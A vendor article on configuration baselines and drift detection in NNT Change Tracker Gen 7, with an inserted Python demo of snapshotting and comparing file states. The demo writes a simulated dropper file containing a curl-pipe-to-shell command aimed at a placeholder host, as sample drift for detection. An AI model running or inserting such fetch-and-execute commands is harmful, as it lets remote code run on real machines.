Understanding what the correct baseline configuration is for your IT system components is a cornerstone of security best practice. Compliance mandates, NERC CIP in particular, require baselines of installed software, updates and open ports to be captured and then reported against.

Determining the optimum configuration state for an IT device will comprise both its:

Functional Requirements (Which applications does this system support? Which software packages does it need? What does the filesystem structure look like? What are the configuration settings needed for it to deliver its services?)

and its:

Security Posture (What is the hardened build for this system? What are the minimum services, ports, and functions required, and what can we disable as a result? What are the configuration settings needed to mitigate vulnerabilities known to affect this device?)

Change Tracker Gen 7 automates both using built-in templates and audit reports, combined with an intelligent discovery process that assigns them to devices.

Each device resides within a group and each group has a range of Device Configuration Templates and Scheduled Reports (see the previous Top Tip ‘Functional Specific Group – Inherited Monitoring and Reporting Templates’).


The Compliance Report conveys one definition of a baseline. We typically use CIS Benchmark reports to assess whether a device is compliant with the CIS Secure Configuration best practice, so the report itself encapsulates what the ideal configuration looks like from a security point of view and scores the device against it. In other words, the baseline defined in the Compliance Report is pre-defined and ‘hard wired’ (although any rules and settings within the report can be edited or added to fit your own hardened build standard; contact NNT support for guidance).

By contrast the Device Configuration Template establishes a baseline dynamically by taking a snapshot of the device configuration when enabled. This baseline can comprise any mixture of file attributes/file hash values, Windows registry and security policy settings, installed software and updates, service and process lists, config file contents, user accounts and open port lists.

For direct host monitoring where an agent is being used, this baseline of initial states is held locally by the NNT Agent and is used to evaluate and report changes as they occur. For agentless monitoring, the baselines are held by the NNT Proxy Agent. In both instances, storing the baseline local to the monitoring agent distributes processing and storage resources and maximizes performance by performing differencing locally. In the case of the direct host monitoring agent, this also allows Live Tracking of changes for real-time detection.

This means that the baseline in this scenario is a point-in-time starting state for a device, with any drift over time recorded step-by-step as a sequence of change events.

New Baseline Reports – Centralized collation of Baseline states

With Change Tracker Gen 7 and the new Gen 7 Agent, a third baseline perspective is now available, providing a hybrid of the two baseline options described previously.

Now any device being monitored can have its current configured state captured and used to dynamically generate a Baseline Report. The Baseline Report is of huge value because:

- Can be used as a ‘hard copy’ record of a device's baseline state
- Can be used as a ‘Gold Standard’ baseline from which any configuration drift over time for the device can be exposed
- Can be used to determine configuration differences between a ‘Gold Standard’ device and other similar devices

Any tracker or trackers specified in a Device Configuration Template can be enabled to issue Baseline Events: just check the ‘Send Baseline Events’ box for that tracker.


Once enabled, this will allow a Baseline Report to be generated for the device for any tracker or mixture of trackers.


Running a Baseline Report

Using Baseline Reports is then simply a case of running the report, either Ad Hoc or Scheduled, just like any other Compliance Report, with results sortable by Pass/Fail as usual.


And you can use the Compare Results function to see exactly what has changed from one report result to another.
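The snapshot-then-difference mechanism described above for the Device Configuration Template (a point-in-time baseline with drift recorded as a sequence of change events) and the Compare Results step here (one baseline report diffed against another, including a Gold Standard device against a similar device) reduced to working code. This is an added illustration and not NNT agent or Change Tracker code; the directory layout, file contents and the JSON "report" format are constructed for the example, and only file attributes and hashes are tracked (a real template would also cover registry, services, ports and so on).

```python
import hashlib
import json
import stat
import tempfile
from pathlib import Path


def snapshot(root):
    """Point-in-time baseline of a directory tree: relative path -> attributes + SHA-256.
    Stands in for the 'snapshot when enabled' baseline a file tracker would take
    (constructed illustration, not NNT's format)."""
    root = Path(root)
    baseline = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        st = path.stat()
        baseline[path.relative_to(root).as_posix()] = {
            "sha256": hashlib.sha256(path.read_bytes()).hexdigest(),
            "size": st.st_size,
            "mode": oct(stat.S_IMODE(st.st_mode)),
        }
    return baseline


def compare(baseline, current):
    """Difference two baselines and return the drift as change events.
    Each event is (event_type, path, detail); 'modified' carries {attr: (old, new)}."""
    events = []
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            events.append(("removed", path, baseline[path]))
        elif path not in baseline:
            events.append(("added", path, current[path]))
        else:
            changed = {k: (baseline[path][k], current[path][k])
                       for k in baseline[path] if baseline[path][k] != current[path][k]}
            if changed:
                events.append(("modified", path, changed))
    return events


def baseline_report(baseline):
    """'Hard copy' of a baseline: canonical JSON that can be stored centrally and
    reused as a Gold Standard for other devices (hypothetical report format)."""
    return json.dumps(baseline, indent=2, sort_keys=True)


def _populate(root, files):
    """Write a constructed set of files under root."""
    for rel, content in files.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)


def demo():
    """Constructed scenario: capture a baseline, let the device drift, then compare a
    second 'similar' device against the stored Gold Standard. Returns both event lists."""
    gold_files = {
        "etc/ssh/sshd_config": b"PermitRootLogin no\nPasswordAuthentication no\n",
        "etc/hosts": b"127.0.0.1 localhost\n",
        "usr/local/bin/agent": b"#!/bin/sh\nexec /opt/agent/run\n",
    }
    with tempfile.TemporaryDirectory() as device, tempfile.TemporaryDirectory() as other:
        _populate(device, gold_files)
        gold = snapshot(device)          # baseline taken when tracking is enabled
        report = baseline_report(gold)   # centrally held record of that state

        # Drift on the same device: one setting weakened, one unexpected file dropped in.
        (Path(device) / "etc/ssh/sshd_config").write_bytes(
            b"PermitRootLogin yes\nPasswordAuthentication no\n")
        _populate(device, {"tmp/dropper.sh": b"curl http://example.invalid/x | sh\n"})
        drift = compare(gold, snapshot(device))

        # A second device built from the same image but missing the agent wrapper.
        _populate(other, {k: v for k, v in gold_files.items() if k != "usr/local/bin/agent"})
        device_diff = compare(json.loads(report), snapshot(other))
    return drift, device_diff


if __name__ == "__main__":
    drift, device_diff = demo()
    for event in drift:
        print("drift:", event[0], event[1])
    for event in device_diff:
        print("vs gold:", event[0], event[1])
```

Because the diff is computed on the stored snapshots rather than by re-reading the Gold Standard device, the same `compare` function serves both the step-by-step drift view and the device-to-device comparison; the only difference is which two baselines are handed to it.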


Copyright 2017, New Net Technologies Ltd. All rights reserved. 